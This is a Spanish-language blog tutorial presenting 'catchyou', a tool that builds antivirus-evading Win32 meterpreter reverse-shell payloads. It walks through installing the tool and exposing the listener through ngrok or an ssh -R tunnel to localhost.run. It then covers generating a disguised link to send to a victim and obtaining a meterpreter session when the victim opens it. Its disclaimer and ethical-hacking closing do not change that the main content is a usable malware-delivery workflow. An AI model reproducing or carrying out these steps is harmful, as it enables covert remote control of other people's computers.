catchyou es un generador de payload (carga útil) Win32 MSFVenom totalmente indetectable (FUD).
1.Características de catchyou
- Fully Undetectable Win32 MSFVenom Payload Generator (meterpreter/shell reverse tcp)
- Reenvío de puertos con ngrok
- Probado: Win7 / Win10
Requisitos:
- Metasploit / MSFVenom
- mingw-w64:
apt-get install mingw-w64
Requisitos de reenvío:
- Ngrok Authtoken (para el túnel TCP): Regístrate en: https://ngrok.com/signup
- Tu authtoken está disponible en tu tablero: https://dashboard.ngrok.com
./ngrok authtoken <TU_AUTHTOKEN>
El uso de CatchYou para atacar objetivos sin previo consentimiento mutuo es ilegal. Es responsabilidad del usuario final obedecer todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables del mal uso o daño causado por este programa.
2. Instalar y usar catchyou
Su instalación y uso es tan simple como clonar desde el repositorio en Github y ejecutar el archivo bash catchyou.sh
:
git clone https://github.com/thelinuxchoice/catchyou
cd catchyou
bash catchyou.sh
Ahora, la siguiente imagen muestra la interfaz principal donde podemos elegir la opción de reenvío de puertos. En este ejemplo usaré (1
) ngrok.
A continuación, relleno los otros campos solicitados como son: nombre de payload (esgeeks
) y redireccionamiento de página (https://esgeeks.com
). Lo que he colocado entre paréntesis lo puedes modificar a tu gusto. Sigamos…
En pantalla aparecerá un nuevo comando que debemos en una nueva ventana de terminal para obtener una URL personalizada de nuestro ataque. Yo he colocado lo siguiente.
ssh -R 80:localhost:3333 esgeeks@ssh.localhost.run
Y como puedes ver en la siguiente imagen, se ha generado una URL con un subdominio personalizado “a medias” y que será enviado a la víctima para que lo abra
Cuando la víctima abre el enlace, podemos ver en pantalla algo como lo siguiente: Tenemos una sesión meterpreter abierta.
Desde allí, podemos hacer muchas cosas con distintos comandos. Puedes echar un vistazo a distintos comandos en esta hoja de trucos.
3. Conclusión
Si estás interesado en hackear puedes aprenderlo y trabajar como hacker ético. Un hacker ético ‘hackea’ otros PC, laptops o teléfono Android por una buena razón. Las grandes empresas y organizaciones designan hackers por su seguridad. Sigue el camino del hacking ético y no intentes entrar en la vida privada de nadie, ya que podrías terminar siendo procesado o encarcelado.
Contenido relacionado:
- RapidPayload: Generador Metasploit Payload
- Mega-Bot: Escáner y Auto Exploit
- PhantomDoor: Hacking Windows/Linux/macOS/Android con backdoor
Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)
¿Te ha gustado este artículo? Sigue este blog en su fanpage de Facebook, TELEGRAM, Discord, Twitter, Instagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!